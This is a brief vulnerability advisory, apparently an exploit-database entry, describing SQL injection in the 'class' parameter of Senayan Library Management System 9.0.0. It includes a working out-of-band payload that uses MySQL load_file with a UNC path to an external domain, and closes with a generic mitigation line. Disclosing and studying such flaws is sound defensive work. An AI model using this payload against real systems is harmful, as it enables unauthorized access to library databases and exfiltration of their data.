vendor:
Senayan Library Management System
by:
nu11secur1ty
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Senayan Library Management System
Affected Version From: 9.0.0
Affected Version To: 9.0.0
Patch Exists:
Related CWE:
CPE: a:slims:slims:9.0.0
Platforms Tested:
2022
Senayan Library Management System v9.0.0 – SQL Injection
The manual insertion `point 3` with `class` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.comfbe'))+' was submitted in the manual insertion point 3. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.